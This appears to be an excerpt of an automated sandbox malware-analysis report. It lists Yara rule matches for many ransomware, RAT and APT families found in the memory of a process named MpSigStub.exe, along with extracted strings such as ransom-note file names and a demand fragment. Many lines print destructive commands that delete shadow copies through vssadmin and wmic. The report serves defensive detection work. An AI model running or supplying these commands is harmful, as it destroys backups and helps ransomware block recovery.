Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected BLACKMatter Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Clay Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Thanos ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Jigsaw
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected CryLock ransomware
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Sapphire Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected OCT Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Snatch Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected AESCRYPT Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected RansomwareGeneric
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Silvertor Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Ouroboros ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Annabelle Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Gocoder ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp, type: MEMORY
Yara detected WannaRen ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Chaos Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Mock Ransomware
Source: Yara match File source: 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Conti ransomware
Source: Yara match File source: 36.3.MpSigStub.exe.197a407e899.150.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a407d495.109.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a407d495.152.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a407fe9d.151.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a407e899.124.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a407d495.123.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a407fe9d.110.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a407e899.111.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a407fe9d.125.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6339772836.00000197A3E9A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6331669561.00000197A4068000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6316141195.00000197A4068000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected NoCry Ransomware
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected ByteLocker Ransomware
Source: Yara match File source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected RegretLocker Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Clop Ransomware
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Ryuk ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Porn Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected LockBit ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected DarkSide Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected LOCKFILE ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Cerber ransomware
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected HiddenTear ransomware
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Rhino ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Mailto ransomware
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected CoronaCrypt Ransomware
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Voidcrypt Ransomware
Source: Yara match File source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6278908021.00000197A4866000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Buran Ransomware
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected GoGoogle ransomware
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected VHD ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Axiom Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Artemon Ransomware
Source: Yara match File source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Netwalker ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Jcrypt Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Covid19 Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Delta Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected LokiLocker Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Cryptolocker ransomware
Source: Yara match File source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Marvel Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Cute Ransomware
Source: Yara match File source: 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Xorist ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Found potential ransomware demand text
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: )Decrypting of your files is only possible
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: Decrypting of your files is only possible
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: )Decrypting of your files is only possible]
Found string related to ransomware
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp Binary or memory string: &act=gettext&lang=
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp Binary or memory string: &encrypted=
May drop file containing decryption instructions (likely related to ransomware)
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp Binary or memory string: HELP_instructions.html
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp Binary or memory string: HOW TO DECRYPT FILES.txt
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp Binary or memory string: How to decrypt files.html
Deletes shadow drive data (may be related to ransomware)
Source: MpSigStub.exe, 00000024.00000003.6328862944.00000197A3361000.00000004.00000001.sdmp Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp Binary or memory string: vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp Binary or memory string: vssadmin.exedeleteshadows/all/quiet
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp Binary or memory string: %vssadmin.exedeleteshadows/all/quiet
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp Binary or memory string: 'vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp Binary or memory string: vssadmindeleteshadows/all/quiet
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp Binary or memory string: !vssadmindeleteshadows/all/quiet
Source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp Binary or memory string: vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp Binary or memory string: Nvssadmin.exe Delete Shadows /All /Quiet
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp Binary or memory string: Nvssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp Binary or memory string: Fvssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp Binary or memory string: #vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp Binary or memory string: /c vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp Binary or memory string: /c vssadmin delete shadows /all /quiet]
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp Binary or memory string: vssadmindeleteshadows
Source: MpSigStub.exe, 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp Binary or memory string: vssadmin Delete Shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp Binary or memory string: vssadmin delete shadows /all
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp Binary or memory string: /c vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp Binary or memory string: cmd /c vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp Binary or memory string: 6vssadmin.exe delete shadows
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp Binary or memory string: vssadmin.exe delete shadows /all /Quiet
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp Binary or memory string: vssadmin delete shadows /all /for=
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp Binary or memory string: cmd.exe /c vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp Binary or memory string: /c vssadmin.exe delete shadows /quiet /all
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp Binary or memory string: vssadmin.exe vssadmin delete shadows / all / quiet
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp Binary or memory string: */C vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp Binary or memory string: /C vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp Binary or memory string: /c vssadmin.exe Delete Shadows /All /Quiet
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp Binary or memory string: vssadmin delete shadows /for=c: /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp Binary or memory string: vssadmin delete shadows /for=d: /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp Binary or memory string: vssadmin.exe delete shadows /all /quiet;wmic shadowcopy delete
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp Binary or memory string: vssadmin delete shadows /all /quiet & wmic shadowcopy delete
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: vssadmin delete shadows /All]
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: /C vssadmin Delete Shadows /Quiet /All
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp Binary or memory string: vssadmin delete shadows
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp Binary or memory string: /C vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp Binary or memory string: /C vssadmin.exe delete shadows /all /quietx
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp Binary or memory string: T/c vssadmin.exe Delete Shadows /All /Quiet
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp Binary or memory string: /c vssadmin.exe delete shadows /all /quiet]

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 36.3.MpSigStub.exe.197a36f3b2a.205.unpack, type: UNPACKEDPE Matched rule: dump_tool Author: @patrickrolsen
Source: 36.3.MpSigStub.exe.197a36f3b2a.148.unpack, type: UNPACKEDPE Matched rule: dump_tool Author: @patrickrolsen
Source: 36.3.MpSigStub.exe.197a3279566.201.raw.unpack, type: UNPACKEDPE Matched rule: Detects OilRig malware Author: Eyal Sela
Source: 36.3.MpSigStub.exe.197a364b8a5.203.raw.unpack, type: UNPACKEDPE Matched rule: Detects Tofu Trojan Author: Cylance
Source: 36.3.MpSigStub.exe.197a36f3b2a.205.raw.unpack, type: UNPACKEDPE Matched rule: dump_tool Author: @patrickrolsen
Source: 36.3.MpSigStub.exe.197a4fa798e.184.raw.unpack, type: UNPACKEDPE Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 36.3.MpSigStub.exe.197a364b8a5.181.raw.unpack, type: UNPACKEDPE Matched rule: Detects Tofu Trojan Author: Cylance
Source: 36.3.MpSigStub.exe.197a4f46966.113.raw.unpack, type: UNPACKEDPE Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: 36.3.MpSigStub.exe.197a3929e2b.149.unpack, type: UNPACKEDPE Matched rule: Strings identifying the core REDLEAVES RAT in its deobfuscated state Author: USG
Source: 36.3.MpSigStub.exe.197a39e033e.65.unpack, type: UNPACKEDPE Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 36.3.MpSigStub.exe.197a47aa096.53.raw.unpack, type: UNPACKEDPE Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 36.3.MpSigStub.exe.197a47aa096.213.raw.unpack, type: UNPACKEDPE Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 36.3.MpSigStub.exe.197a37e87d6.70.raw.unpack, type: UNPACKEDPE Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a32ef4fa.18.raw.unpack, type: UNPACKEDPE Matched rule: Detects Molerats sample - July 2017 Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a364dcf9.202.raw.unpack, type: UNPACKEDPE Matched rule: Detects Tofu Trojan Author: Cylance
Source: 36.3.MpSigStub.exe.197a4fa8d92.185.raw.unpack, type: UNPACKEDPE Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 36.3.MpSigStub.exe.197a32a3acd.179.raw.unpack, type: UNPACKEDPE Matched rule: Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan) Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a364dcf9.182.raw.unpack, type: UNPACKEDPE Matched rule: Detects Tofu Trojan Author: Cylance
Source: 36.3.MpSigStub.exe.197a44b5166.45.raw.unpack, type: UNPACKEDPE Matched rule: Detects Derusbi Kernel Driver Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a4fb9462.85.raw.unpack, type: UNPACKEDPE Matched rule: Detects Pupy RAT Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a4fb9462.85.raw.unpack, type: UNPACKEDPE Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a32ee0f6.17.raw.unpack, type: UNPACKEDPE Matched rule: Detects Molerats sample - July 2017 Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a3929e2b.210.unpack, type: UNPACKEDPE Matched rule: Strings identifying the core REDLEAVES RAT in its deobfuscated state Author: USG
Source: 36.3.MpSigStub.exe.197a4c04b1a.11.raw.unpack, type: UNPACKEDPE Matched rule: Detects Crypto Miner strings Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a36f3b2a.193.unpack, type: UNPACKEDPE Matched rule: dump_tool Author: @patrickrolsen
Source: 36.3.MpSigStub.exe.197a36f3b2a.193.raw.unpack, type: UNPACKEDPE Matched rule: dump_tool Author: @patrickrolsen
Source: 36.3.MpSigStub.exe.197a36f3b2a.215.raw.unpack, type: UNPACKEDPE Matched rule: dump_tool Author: @patrickrolsen
Source: 36.3.MpSigStub.exe.197a32a53a1.178.raw.unpack, type: UNPACKEDPE Matched rule: Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan) Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a32eccf2.19.raw.unpack, type: UNPACKEDPE Matched rule: Detects Molerats sample - July 2017 Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a36f3b2a.148.raw.unpack, type: UNPACKEDPE Matched rule: dump_tool Author: @patrickrolsen
Source: 36.3.MpSigStub.exe.197a3f84db6.63.unpack, type: UNPACKEDPE Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: 36.3.MpSigStub.exe.197a3f84db6.63.unpack, type: UNPACKEDPE Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a4644266.106.raw.unpack, type: UNPACKEDPE Matched rule: Detects DNSpionage Karkoff malware Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a4644266.106.raw.unpack, type: UNPACKEDPE Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a4644266.106.raw.unpack, type: UNPACKEDPE Matched rule: Detects HOPLIGHT malware used by HiddenCobra APT group Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a4fa658a.183.raw.unpack, type: UNPACKEDPE Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 36.3.MpSigStub.exe.197a4fa8d92.116.raw.unpack, type: UNPACKEDPE Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 36.3.MpSigStub.exe.197a47aa096.59.raw.unpack, type: UNPACKEDPE Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE Matched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE Matched rule: Detects export from Gold Dragon - February 2018 Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE Matched rule: Detects Running RAT malware from Gold Dragon report Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE Matched rule: Rescator PDB strings within binaries Author: @patrickrolsen
Source: 36.3.MpSigStub.exe.197a4c03116.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects Crypto Miner strings Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a46f017a.58.raw.unpack, type: UNPACKEDPE Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a4f45162.112.raw.unpack, type: UNPACKEDPE Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: 36.3.MpSigStub.exe.197a33b6aa2.66.raw.unpack, type: UNPACKEDPE Matched rule: Detects malware from DrqgonFly APT report Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a36f3b2a.215.unpack, type: UNPACKEDPE Matched rule: dump_tool Author: @patrickrolsen
Source: 36.3.MpSigStub.exe.197a327ab6a.200.raw.unpack, type: UNPACKEDPE Matched rule: Detects OilRig malware Author: Eyal Sela
Source: 36.3.MpSigStub.exe.197a32a2a79.180.raw.unpack, type: UNPACKEDPE Matched rule: Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan) Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a4644a6a.105.raw.unpack, type: UNPACKEDPE Matched rule: Detects DNSpionage Karkoff malware Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a4644a6a.105.raw.unpack, type: UNPACKEDPE Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a4644a6a.105.raw.unpack, type: UNPACKEDPE Matched rule: Detects HOPLIGHT malware used by HiddenCobra APT group Author: Florian Roth
